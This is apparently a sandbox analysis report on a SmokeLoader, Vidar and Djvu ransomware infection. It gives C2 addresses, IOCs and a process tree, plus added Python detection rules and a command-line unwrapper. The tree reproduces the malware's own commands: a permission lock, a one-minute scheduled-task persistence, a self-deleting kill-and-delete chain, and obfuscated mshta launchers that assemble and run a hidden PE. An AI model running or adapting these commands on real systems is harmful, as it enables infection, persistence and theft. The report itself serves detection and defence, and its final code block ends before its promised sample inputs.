bd313f9102739a231c214b4fe4f6c3a3.exe

General
Target: bd313f9102739a231c214b4fe4f6c3a3.exe
Filesize: 233KB
Completed: 20-10-2021 06:24
Score: 10/10
MD5: bd313f9102739a231c214b4fe4f6c3a3
SHA1: 728aea2174af79ab9e03cc3d31ec069d5ceb513c
SHA256: c95d04ae659ff27da971c970ec072ffbec37551120fe8c395d5455fba4139d0d

Malware Config

Extracted
Family: smokeloader
Version: 2020
C2:
  http://nusurtal4f.net/
  http://netomishnetojuk.net/
  http://escalivrouter.net/
  http://nick22doom4.net/
  http://wrioshtivsio.su/
  http://nusotiso4.su/
  http://rickkhtovkka.biz/
  http://palisotoliso.net/
rc4.i32: (two keys; values not reproduced in this extract)

Extracted
Family: vidar
Version: 41.5
Botnet: 706
C2: https://mas.to/@xeroxxx (a Mastodon profile; Vidar does not use it as the C2 itself but reads the real C2 address out of the profile text, so the address worth blocking is whatever that profile resolves to at the time)
Attributes: profile_id = 706

Extracted
Family: vidar
Version: 41.5
Botnet: 517
C2: https://mas.to/@xeroxxx
Attributes: profile_id = 517

Two Vidar configurations with different botnet/profile IDs were extracted; this matches the two processes the family_vidar YARA rule hits below (7A0F.exe, dropped directly by the loader, and build2.exe, dropped by the Djvu chain), both of which load the NSS DLLs listed under Downloads and both of which run the same taskkill/timeout/del self-delete command.

Extracted
Family: djvu
C2: http://rlrz.org/lancer

Signatures 29

  • Detected Djvu ransomware

    Reported IOCs (resource | yara_rule)

    behavioral2/memory/4492-128-0x0000000004B10000-0x0000000004C2B000-memory.dmp | family_djvu
    behavioral2/memory/2172-130-0x0000000000424141-mapping.dmp | family_djvu
    behavioral2/memory/2172-129-0x0000000000400000-0x0000000000537000-memory.dmp | family_djvu
    behavioral2/memory/2172-137-0x0000000000400000-0x0000000000537000-memory.dmp | family_djvu
    behavioral2/memory/1560-146-0x0000000000424141-mapping.dmp | family_djvu
    behavioral2/memory/1560-148-0x0000000000400000-0x0000000000537000-memory.dmp | family_djvu
  • Djvu Ransomware

    Description

    Ransomware which is a variant of the STOP family.

  • SmokeLoader

    Description

    Modular backdoor trojan in use since 2014.

  • Vidar

    Description

    Vidar is an infostealer based on Arkei stealer.

  • Vidar Stealer

    Reported IOCs (resource | yara_rule)

    behavioral2/memory/4412-175-0x0000000004AF0000-0x0000000004BC6000-memory.dmp | family_vidar
    behavioral2/memory/4412-176-0x0000000000400000-0x0000000002F75000-memory.dmp | family_vidar
    behavioral2/memory/2596-194-0x0000000000400000-0x00000000004D9000-memory.dmp | family_vidar
    behavioral2/memory/2596-195-0x00000000004A18CD-mapping.dmp | family_vidar
    behavioral2/memory/2596-198-0x0000000000400000-0x00000000004D9000-memory.dmp | family_vidar
    behavioral2/memory/4944-197-0x0000000004C90000-0x0000000004D66000-memory.dmp | family_vidar
  • Downloads MZ/PE file
  • Executes dropped EXE
    78D5.exe, 7A0F.exe, 7C04.exe, CW8KXz0H.Exe, build2.exe, build3.exe, mstsca.exe

    Reported IOCs (pid | process)

    4492 | 78D5.exe
    4412 | 7A0F.exe
    2172 | 78D5.exe
    3140 | 7C04.exe
    688 | 78D5.exe
    1560 | 78D5.exe
    1952 | CW8KXz0H.Exe
    4944 | build2.exe
    3488 | build3.exe
    196 | build3.exe
    2596 | build2.exe
    1356 | mstsca.exe
    1848 | mstsca.exe
  • Deletes itself

    Reported IOCs (pid | process)

    3060 | (process name not recorded)
  • Loads dropped DLL
    bd313f9102739a231c214b4fe4f6c3a3.exe, msiexec.exe, 7A0F.exe, build2.exe

    Reported IOCs (pid | process)

    3472 | bd313f9102739a231c214b4fe4f6c3a3.exe
    4956 | msiexec.exe
    4412 | 7A0F.exe  (×2)
    2596 | build2.exe  (×2)
  • Modifies file permissions
    icacls.exe

    TTPs

    File Permissions Modification

    Reported IOCs (pid | process)

    656 | icacls.exe
  • Reads user/profile data of web browsers

    Description

    Infostealers often target stored browser data, which can include saved credentials, cookies and autofill entries.

    TTPs

    Data from Local System, Credentials in Files
  • Accesses 2FA software files, possible credential harvesting

    TTPs

    Data from Local System, Credentials in Files
  • Accesses cryptocurrency files/wallets, possible credential harvesting

    TTPs

    Data from Local System, Credentials in Files
  • Adds Run key to start application
    78D5.exe

    Description

    The Run value points at the copy of 78D5.exe in the GUID-named directory under AppData\Local that icacls locks in "Modifies file permissions". The --AutoStart argument is evidently how the ransomware tells a persistence launch apart from its first run; the process tree shows the first run relaunching itself with --Admin IsNotAutoStart IsNotTask.

    TTPs

    Registry Run Keys / Startup Folder, Modify Registry

    Reported IOCs (description | ioc | process)

    Set value (str) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\5715edab-3042-4097-9ffa-cf70482c474f\\78D5.exe\" --AutoStart" | 78D5.exe
  • Checks installed software on the system

    Description

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    TTPs

    Query Registry
  • Looks up external IP address via web service

    Description

    Uses a legitimate IP lookup service to find the infected system's external IP.

    Reported IOCs (flow | ioc)

    33 | api.2ip.ua
    26 | api.2ip.ua
    27 | api.2ip.ua
  • Suspicious use of SetThreadContext
    78D5.exe (×2), build3.exe, build2.exe, mstsca.exe

    Description

    Each entry is a process starting a second copy of itself, writing into it and resetting its main thread's context, the usual unpack-by-hollowing step. The unpacked payload therefore lives in the child (2172, 1560, 196, 2596, 1848), which is where most of the family YARA matches above land, not in the dropped file on disk; memory of those child PIDs is what to carve for a clean sample.

    Reported IOCs (description | pid | process | target process)

    PID 4492 set thread context of 2172 | 4492 | 78D5.exe | 78D5.exe
    PID 688 set thread context of 1560 | 688 | 78D5.exe | 78D5.exe
    PID 3488 set thread context of 196 | 3488 | build3.exe | build3.exe
    PID 4944 set thread context of 2596 | 4944 | build2.exe | build2.exe
    PID 1356 set thread context of 1848 | 1356 | mstsca.exe | mstsca.exe
  • Enumerates physical storage devices

    Description

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

    TTPs

    System Information Discovery
  • Checks SCSI registry key(s)
    bd313f9102739a231c214b4fe4f6c3a3.exe

    Description

    SCSI information is often read in order to detect sandboxing environments.

    TTPs

    Query Registry, Peripheral Device Discovery, System Information Discovery

    Reported IOCs (description | ioc | process)

    Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | bd313f9102739a231c214b4fe4f6c3a3.exe
    Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | bd313f9102739a231c214b4fe4f6c3a3.exe
    Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | bd313f9102739a231c214b4fe4f6c3a3.exe
  • Checks processor information in registry
    build2.exe, 7A0F.exe

    Description

    Processor information is often read in order to detect sandboxing environments.

    TTPs

    Query Registry, System Information Discovery

    Reported IOCs (description | ioc | process)

    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | build2.exe
    Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | 7A0F.exe
    Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | 7A0F.exe
    Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | build2.exe
  • Creates scheduled task(s)
    schtasks.exe (×2)

    Description

    Schtasks is often used by malware for persistence or to perform post-infection execution. Here both invocations create the same task, "Azure-Update-Task", firing every minute and running C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe; a one-minute task whose action lives in a user-writable directory is a strong hunting indicator on its own.

    TTPs

    Scheduled Task

    Reported IOCs (pid | process)

    684 | schtasks.exe
    3184 | schtasks.exe
  • Delays execution with timeout.exe
    timeout.exe (×2)

    Reported IOCs (pid | process)

    2112 | timeout.exe
    3576 | timeout.exe
  • Kills process with taskkill
    taskkill.exe (×3)

    Reported IOCs (pid | process)

    2396 | taskkill.exe
    1976 | taskkill.exe
    4448 | taskkill.exe
  • Modifies system certificate store
    build2.exe, 78D5.exe

    Description

    The keys written are under SystemCertificates\AuthRoot\Certificates, which is the store that Windows' automatic root certificate update populates when a TLS connection chains to a root not yet cached locally; the CryptnetUrlCache files listed under Downloads are the matching fetches. These entries are therefore consistent with a side effect of the samples' outbound HTTPS connections rather than a root the malware installed itself. Treat this signature as corroborating, not as evidence of certificate tampering, unless the Blob data turns out to hold a root that Microsoft does not distribute.

    TTPs

    Install Root Certificate, Modify Registry

    Reported IOCs (description | ioc | process)

    Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | build2.exe
    Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = <blob data elided> | …exe  (×4)
    Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | 78D5.exe
    Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = <blob data elided> | …exe
  • Suspicious behavior: EnumeratesProcesses
    bd313f9102739a231c214b4fe4f6c3a3.exe

    Reported IOCs (pid | process)

    3472 | bd313f9102739a231c214b4fe4f6c3a3.exe  (×2)
    3060 | (process name not recorded)  (×62)
  • Suspicious behavior: GetForegroundWindowSpam

    Reported IOCs (pid | process)

    3060 | (process name not recorded)
  • Suspicious behavior: MapViewOfSection
    bd313f9102739a231c214b4fe4f6c3a3.exe

    Reported IOCs (pid | process)

    3472 | bd313f9102739a231c214b4fe4f6c3a3.exe
  • Suspicious use of AdjustPrivilegeToken
    taskkill.exe

    Reported IOCs (description | pid | process; the two 3060 entries alternate throughout the original list)

    Token: SeShutdownPrivilege | 3060 | (process name not recorded)  (×32)
    Token: SeCreatePagefilePrivilege | 3060 | (process name not recorded)  (×31)
    Token: SeDebugPrivilege | 2396 | taskkill.exe
  • Suspicious use of WriteProcessMemory
    78D5.exe (×3), 7C04.exe, mshta.exe (×3), cmd.exe (×2), CW8KXz0H.Exe

    Description

    PID 3060 has no image name anywhere in this report, yet it is the parent that launches 78D5.exe (4492), 7A0F.exe (4412) and 7C04.exe (3140), the process that deletes the original sample, and the one repeatedly enabling SeShutdownPrivilege/SeCreatePagefilePrivilege. The original bd313f9102739a231c214b4fe4f6c3a3.exe (3472) only loads a DLL, maps a section and enumerates processes, which is consistent with 3060 being an existing process the loader injected into. Three writes per child is what ordinary process creation looks like in this sandbox's logging (every parent here shows them); the ten-write entries coincide with the SetThreadContext hits above and mark the hollowed copies of 78D5.exe.

    Reported IOCs (source pid (process) → target pid (target process), × occurrences)

    3060 (not recorded) → 4492 (78D5.exe)  ×3
    3060 (not recorded) → 4412 (7A0F.exe)  ×3
    4492 (78D5.exe) → 2172 (78D5.exe)  ×10
    3060 (not recorded) → 3140 (7C04.exe)  ×3
    3140 (7C04.exe) → 516 (mshta.exe)  ×3
    2172 (78D5.exe) → 656 (icacls.exe)  ×3
    2172 (78D5.exe) → 688 (78D5.exe)  ×3
    516 (mshta.exe) → 1040 (cmd.exe)  ×3
    688 (78D5.exe) → 1560 (78D5.exe)  ×10
    1040 (cmd.exe) → 1952 (CW8KXz0H.Exe)  ×3
    1040 (cmd.exe) → 2396 (taskkill.exe)  ×3
    1952 (CW8KXz0H.Exe) → 2676 (mshta.exe)  ×3
    2676 (mshta.exe) → 3744 (cmd.exe)  ×3
    1952 (CW8KXz0H.Exe) → 4984 (mshta.exe)  ×3
    4984 (mshta.exe) → 4720 (cmd.exe)  ×3
    4720 (cmd.exe) → 1984 (cmd.exe)  ×3
    4720 (cmd.exe) → 4888 (cmd.exe)  ×2
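The signatures above are the sandbox's own behavioural rules. As an added example that is not part of this report or of the sandbox's rule set, the following Python turns the most specific of them into checks over process-creation telemetry and runs them against records constructed from the process tree on this page (PIDs, images and command lines copied from the tree, one mshta line shortened) plus two made-up benign controls. The ProcEvent record shape, the rule names and the two benign command lines are this example's own; the only normalisation is case-folding and whitespace collapsing, which is what defeats the case-randomised launchers seen here.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """One process-creation record (the fields Sysmon event 1 or EDR telemetry carry)."""
    pid: int
    ppid: int
    image: str
    cmdline: str


def normalize(cmdline: str) -> str:
    """Lower-case and collapse whitespace. The droppers here randomise letter case
    ('vbscRipT: ClosE', 'sTart msiexec -Y'), which breaks exact-string matching
    but not a case-folded comparison."""
    return re.sub(r"\s+", " ", cmdline).strip().lower()


def image_is(ev: ProcEvent, name: str) -> bool:
    return ev.image.lower().endswith("\\" + name)


# Every rule takes the event plus its normalised command line and returns True on a hit.

def schtasks_minute_from_user_path(ev: ProcEvent, n: str) -> bool:
    """A task firing every N minutes whose action lives under a user profile
    (here "Azure-Update-Task" -> ...\\AppData\\Roaming\\Microsoft\\Network\\mstsca.exe)."""
    return (image_is(ev, "schtasks.exe") and "/create" in n
            and re.search(r"/sc minute /mo \d+ ", n) is not None
            and re.search(r'/tr "?c:\\users\\[^"]*\\appdata\\', n) is not None)


def icacls_deny_everyone(ev: ProcEvent, n: str) -> bool:
    """icacls <dir> /deny *S-1-1-0:(OI)(CI)(DE,DC): Everyone loses delete rights on
    the directory, so the persisted copy cannot be removed by the user."""
    return image_is(ev, "icacls.exe") and "/deny" in n and "*s-1-1-0" in n


def mshta_inline_script(ev: ProcEvent, n: str) -> bool:
    """mshta.exe handed a vbscript:/javascript: URL instead of an .hta file."""
    return image_is(ev, "mshta.exe") and re.search(r"\b(vbscript|javascript):", n) is not None


def taskkill_timeout_delete(ev: ProcEvent, n: str) -> bool:
    """cmd /c taskkill ... & timeout ... & del ...: the stealer's self-delete chain."""
    return (image_is(ev, "cmd.exe") and "taskkill" in n and "timeout" in n
            and re.search(r"\bdel\b", n) is not None)


def msiexec_register_module(ev: ProcEvent, n: str) -> bool:
    """msiexec /y (or -y) <file> calls DllRegisterServer in <file>; no .msi is
    involved, so the 'module' can be a dropped DLL under any extension. Matched on
    the command line alone so the cmd.exe that starts it is flagged as well."""
    return re.search(r'msiexec(?:\.exe)?"? [-/]y \S+', n) is not None


def binary_concat_build(ev: ProcEvent, n: str) -> bool:
    """copy /b a + b out, or a bare "MZ" written with set /p: a PE being
    reassembled on disk from header-less fragments."""
    return image_is(ev, "cmd.exe") and (
        re.search(r"\bcopy (?:/\w )*/b [^&]*\+", n) is not None
        or re.search(r'set /p ?= ?"mz"', n) is not None)


RULES = {
    "schtasks_minute_from_user_path": schtasks_minute_from_user_path,
    "icacls_deny_everyone": icacls_deny_everyone,
    "mshta_inline_script": mshta_inline_script,
    "taskkill_timeout_delete": taskkill_timeout_delete,
    "msiexec_register_module": msiexec_register_module,
    "binary_concat_build": binary_concat_build,
}


def scan(events):
    """Return {rule name: sorted PIDs that triggered it}."""
    hits = {name: [] for name in RULES}
    for ev in events:
        n = normalize(ev.cmdline)
        for name, rule in RULES.items():
            if rule(ev, n):
                hits[name].append(ev.pid)
    return {name: sorted(pids) for name, pids in hits.items()}


# Constructed records: PIDs, images and command lines copied from the process tree in
# this report (the mshta line shortened), plus two benign controls (900, 901) that are made up.
SAMPLE_EVENTS = [
    ProcEvent(656, 2172, r"C:\Windows\SysWOW64\icacls.exe",
              r'icacls "C:\Users\Admin\AppData\Local\5715edab-3042-4097-9ffa-cf70482c474f" /deny *S-1-1-0:(OI)(CI)(DE,DC)'),
    ProcEvent(684, 196, r"C:\Windows\SysWOW64\schtasks.exe",
              r'/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"'),
    ProcEvent(2448, 2596, r"C:\Windows\SysWOW64\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\058258aa-43e0-4870-b8ca-c31ca4f588b7\build2.exe" & del C:\ProgramData\*.dll & exit'),
    ProcEvent(516, 3140, r"C:\Windows\SysWOW64\mshta.exe",
              r'"C:\Windows\System32\mshta.exe" vbscRipT: ClosE ( cReatEobJeCt ( "WsCriPT.shelL" ). ruN ( "Cmd /r tyPe ""C:\Users\Admin\AppData\Local\Temp\7C04.exe"" > CW8KXz0H.Exe && START CW8kxZ0H.exe -pg3MYeIUhufHfaRXpQElEvC" , 0, TRuE ) )'),
    ProcEvent(4720, 4984, r"C:\Windows\SysWOW64\cmd.exe",
              r'"C:\Windows\System32\cmd.exe" /C echo | sET /P = "MZ" > 3E_W1GCB.Vng & Copy /y /B 3E_w1GCb.VNG + Cnq6kZ.l +j4HWCrT.QO WF2ZlH.FM & sTart msiexec -Y .\Wf2zlH.FM & deL CnQ6kZ.L j4HWCRT.QO 3E_W1GCb.Vng'),
    ProcEvent(4956, 4720, r"C:\Windows\SysWOW64\msiexec.exe", r"msiexec -Y .\Wf2zlH.FM"),
    ProcEvent(900, 800, r"C:\Windows\System32\schtasks.exe",
              r'schtasks /create /sc daily /st 02:00 /tn "NightlyBackup" /tr "C:\Program Files\Backup\backup.exe"'),
    ProcEvent(901, 800, r"C:\Windows\System32\msiexec.exe",
              r'msiexec /i "C:\Users\Admin\Downloads\tool.msi" /qn'),
]

if __name__ == "__main__":
    for name, pids in scan(SAMPLE_EVENTS).items():
        print(f"{name:32s} {pids}")
```

Each rule is deliberately narrow (one command-line shape each) so a hit is actionable on its own; the msiexec rule fires twice for the same stage because both the cmd.exe that builds the command and the msiexec.exe it starts carry the `-Y` switch, which is useful when only one of the two events survives in telemetry.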
Processes 33
  • C:\Users\Admin\AppData\Local\Temp\bd313f9102739a231c214b4fe4f6c3a3.exe
    "C:\Users\Admin\AppData\Local\Temp\bd313f9102739a231c214b4fe4f6c3a3.exe"
    Loads dropped DLL
    Checks SCSI registry key(s)
    Suspicious behavior: EnumeratesProcesses
    Suspicious behavior: MapViewOfSection
    PID:3472
  • C:\Users\Admin\AppData\Local\Temp\78D5.exe
    C:\Users\Admin\AppData\Local\Temp\78D5.exe
    Executes dropped EXE
    Suspicious use of SetThreadContext
    Suspicious use of WriteProcessMemory
    PID:4492
    • C:\Users\Admin\AppData\Local\Temp\78D5.exe
      C:\Users\Admin\AppData\Local\Temp\78D5.exe
      Executes dropped EXE
      Adds Run key to start application
      Modifies system certificate store
      Suspicious use of WriteProcessMemory
      PID:2172
      • C:\Windows\SysWOW64\icacls.exe
        icacls "C:\Users\Admin\AppData\Local\5715edab-3042-4097-9ffa-cf70482c474f" /deny *S-1-1-0:(OI)(CI)(DE,DC)
        Modifies file permissions
        PID:656
      • C:\Users\Admin\AppData\Local\Temp\78D5.exe
        "C:\Users\Admin\AppData\Local\Temp\78D5.exe" --Admin IsNotAutoStart IsNotTask
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        PID:688
        • C:\Users\Admin\AppData\Local\Temp\78D5.exe
          "C:\Users\Admin\AppData\Local\Temp\78D5.exe" --Admin IsNotAutoStart IsNotTask
          Executes dropped EXE
          PID:1560
          • C:\Users\Admin\AppData\Local\058258aa-43e0-4870-b8ca-c31ca4f588b7\build2.exe
            "C:\Users\Admin\AppData\Local\058258aa-43e0-4870-b8ca-c31ca4f588b7\build2.exe"
            Executes dropped EXE
            Suspicious use of SetThreadContext
            PID:4944
            • C:\Users\Admin\AppData\Local\058258aa-43e0-4870-b8ca-c31ca4f588b7\build2.exe
              "C:\Users\Admin\AppData\Local\058258aa-43e0-4870-b8ca-c31ca4f588b7\build2.exe"
              Executes dropped EXE
              Loads dropped DLL
              Checks processor information in registry
              Modifies system certificate store
              PID:2596
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\058258aa-43e0-4870-b8ca-c31ca4f588b7\build2.exe" & del C:\ProgramData\*.dll & exit
                PID:2448
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /im build2.exe /f
                  Kills process with taskkill
                  PID:4448
                • C:\Windows\SysWOW64\timeout.exe
                  timeout /t 6
                  Delays execution with timeout.exe
                  PID:3576
          • C:\Users\Admin\AppData\Local\058258aa-43e0-4870-b8ca-c31ca4f588b7\build3.exe
            "C:\Users\Admin\AppData\Local\058258aa-43e0-4870-b8ca-c31ca4f588b7\build3.exe"
            Executes dropped EXE
            Suspicious use of SetThreadContext
            PID:3488
            • C:\Users\Admin\AppData\Local\058258aa-43e0-4870-b8ca-c31ca4f588b7\build3.exe
              "C:\Users\Admin\AppData\Local\058258aa-43e0-4870-b8ca-c31ca4f588b7\build3.exe"
              Executes dropped EXE
              PID:196
              • C:\Windows\SysWOW64\schtasks.exe
                /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                Creates scheduled task(s)
                PID:684
  • C:\Users\Admin\AppData\Local\Temp\7A0F.exe
    C:\Users\Admin\AppData\Local\Temp\7A0F.exe
    Executes dropped EXE
    Loads dropped DLL
    Checks processor information in registry
    PID:4412
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c taskkill /im 7A0F.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7A0F.exe" & del C:\ProgramData\*.dll & exit
      PID:1020
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /im 7A0F.exe /f
        Kills process with taskkill
        PID:1976
      • C:\Windows\SysWOW64\timeout.exe
        timeout /t 6
        Delays execution with timeout.exe
        PID:2112
  • C:\Users\Admin\AppData\Local\Temp\7C04.exe
    C:\Users\Admin\AppData\Local\Temp\7C04.exe
    Executes dropped EXE
    Suspicious use of WriteProcessMemory
    PID:3140
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\System32\mshta.exe" vbscRipT: ClosE ( cReatEobJeCt ( "WsCriPT.shelL" ). ruN ( "Cmd /r tyPe ""C:\Users\Admin\AppData\Local\Temp\7C04.exe"" > CW8KXz0H.Exe && START CW8kxZ0H.exe -pg3MYeIUhufHfaRXpQElEvC &iF """" == """" for %n in ( ""C:\Users\Admin\AppData\Local\Temp\7C04.exe"" ) do taskkill -f -IM ""%~NXn"" " , 0, TRuE ) )
      Suspicious use of WriteProcessMemory
      PID:516
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /r tyPe "C:\Users\Admin\AppData\Local\Temp\7C04.exe" > CW8KXz0H.Exe&&START CW8kxZ0H.exe -pg3MYeIUhufHfaRXpQElEvC &iF "" == "" for %n in ( "C:\Users\Admin\AppData\Local\Temp\7C04.exe" ) do taskkill -f -IM "%~NXn"
        Suspicious use of WriteProcessMemory
        PID:1040
        • C:\Users\Admin\AppData\Local\Temp\CW8KXz0H.Exe
          CW8kxZ0H.exe -pg3MYeIUhufHfaRXpQElEvC
          Executes dropped EXE
          Suspicious use of WriteProcessMemory
          PID:1952
          • C:\Windows\SysWOW64\mshta.exe
            "C:\Windows\System32\mshta.exe" vbscRipT: ClosE ( cReatEobJeCt ( "WsCriPT.shelL" ). ruN ( "Cmd /r tyPe ""C:\Users\Admin\AppData\Local\Temp\CW8KXz0H.Exe"" > CW8KXz0H.Exe && START CW8kxZ0H.exe -pg3MYeIUhufHfaRXpQElEvC &iF ""-pg3MYeIUhufHfaRXpQElEvC "" == """" for %n in ( ""C:\Users\Admin\AppData\Local\Temp\CW8KXz0H.Exe"" ) do taskkill -f -IM ""%~NXn"" " , 0, TRuE ) )
            Suspicious use of WriteProcessMemory
            PID:2676
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /r tyPe "C:\Users\Admin\AppData\Local\Temp\CW8KXz0H.Exe" > CW8KXz0H.Exe&&START CW8kxZ0H.exe -pg3MYeIUhufHfaRXpQElEvC &iF "-pg3MYeIUhufHfaRXpQElEvC " == "" for %n in ( "C:\Users\Admin\AppData\Local\Temp\CW8KXz0H.Exe" ) do taskkill -f -IM "%~NXn"
              PID:3744
          • C:\Windows\SysWOW64\mshta.exe
            "C:\Windows\System32\mshta.exe" vBSCript: cLose ( crEATeobjEct ( "wSCRiPt.SHELl" ). run ( "CMd.exe /C echo | sET /P = ""MZ"" > 3E_W1GCB.Vng & Copy /y /B 3E_w1GCb.VNG + Cnq6kZ.l +j4HWCrT.QO WF2ZlH.FM & sTart msiexec -Y .\Wf2zlH.FM & deL CnQ6kZ.L j4HWCRT.QO 3E_W1GCb.Vng " , 0 , TrUE ) )
            Suspicious use of WriteProcessMemory
            PID:4984
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C echo | sET /P = "MZ" > 3E_W1GCB.Vng & Copy /y /B 3E_w1GCb.VNG + Cnq6kZ.l +j4HWCrT.QO WF2ZlH.FM & sTart msiexec -Y .\Wf2zlH.FM & deL CnQ6kZ.L j4HWCRT.QO 3E_W1GCb.Vng
              Suspicious use of WriteProcessMemory
              PID:4720
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /S /D /c" echo "
                PID:1984
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /S /D /c" sET /P = "MZ" 1>3E_W1GCB.Vng"
                PID:4888
              • C:\Windows\SysWOW64\msiexec.exe
                msiexec -Y .\Wf2zlH.FM
                Loads dropped DLL
                PID:4956
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill -f -IM "7C04.exe"
          Kills process with taskkill
          Suspicious use of AdjustPrivilegeToken
          PID:2396
  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
    Executes dropped EXE
    Suspicious use of SetThreadContext
    PID:1356
    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
      Executes dropped EXE
      PID:1848
      • C:\Windows\SysWOW64\schtasks.exe
        /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
        Creates scheduled task(s)
        PID:3184
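The two mshta.exe entries in the tree above carry the whole 7C04.exe second stage inside a case-randomised vbscript: URL that hands a cmd.exe command line to WScript.Shell.Run; the first copies the dropper to a new name and relaunches it with a -p switch, the second writes the two bytes MZ with set /P, glues them to two header-less fragments with copy /B and hands the result to msiexec -Y, which calls the file's DllRegisterServer. As an added example that is not from the report or the malware, the Python below unwraps that wrapper and pulls the file operations out of the inner command; the two STAGE strings are the command lines recorded in the tree, the field names are this example's own, and reading -p<value> as an archive-password switch is an assumption based on the syntax rather than something the report states.

```python
import re

# WScript.Shell.Run("<cmd>", <window style>, <wait>) inside the vbscript: URL.
RUN_CALL = re.compile(
    r'\.\s*run\s*\(\s*"(?P<cmd>.*)"\s*,\s*\d+\s*,\s*true\s*\)',
    re.IGNORECASE | re.DOTALL,
)


def unwrap_mshta(cmdline: str) -> str:
    """Return the command line that WScript.Shell.Run receives. Inside a VBScript
    string literal a quote is written as "", so undo that doubling."""
    m = RUN_CALL.search(cmdline)
    if m is None:
        raise ValueError("no WScript.Shell.Run(...) call in command line")
    return m.group("cmd").replace('""', '"').strip()


def describe_stage(cmd: str) -> dict:
    """Pull the file operations out of the unwrapped cmd.exe line. Field names are
    this example's own; the patterns are written for the syntax seen in this report."""
    f = re.IGNORECASE
    info = {}
    m = re.search(r'\btype\s+"([^"]+)"\s*>\s*(\S+)', cmd, f)            # type "src" > dst
    if m:
        info["copied_from"], info["copied_to"] = m.group(1), m.group(2)
    m = re.search(r'\bstart\s+(\S+)\s+-p(\S+)', cmd, f)                   # start copy -p<value>
    if m:
        info["launched"], info["password_switch"] = m.group(1), m.group(2)
    m = re.search(r'for\s+%(\w)\s+in\s*\(\s*"([^"]+)"\s*\)\s*do\s+taskkill\s+-f\s+-im\s+"%~nx\1"', cmd, f)
    if m:                                                                  # kill the original by file name
        info["kills_original"] = m.group(2).rsplit("\\", 1)[-1]
    m = re.search(r'\bset\s*/p\s*=\s*"([^"]+)"\s*>\s*(\S+)', cmd, f)      # set /P = "MZ" > hdr
    if m:
        info["header_bytes"], info["header_file"] = m.group(1), m.group(2)
    m = re.search(r'\bcopy\s+(?:/\w\s+)*/b\s+([^&]+?)\s+(\S+)\s*&', cmd, f)  # copy /B a + b + c out
    if m:
        info["concat_parts"] = [p.strip() for p in m.group(1).split("+")]
        info["concat_output"] = m.group(2)
    m = re.search(r'\bmsiexec\s+[-/]y\s+(\S+)', cmd, f)                   # msiexec /y == DllRegisterServer
    if m:
        info["msiexec_module"] = m.group(1)
    m = re.search(r'\bdel\s+([^&]+?)\s*$', cmd, f)                         # trailing cleanup
    if m:
        info["cleanup"] = m.group(1).split()
    return info


def analyze(mshta_cmdline: str) -> dict:
    inner = unwrap_mshta(mshta_cmdline)
    return {"inner_command": inner, **describe_stage(inner)}


# The two mshta.exe command lines recorded in the process tree of this report.
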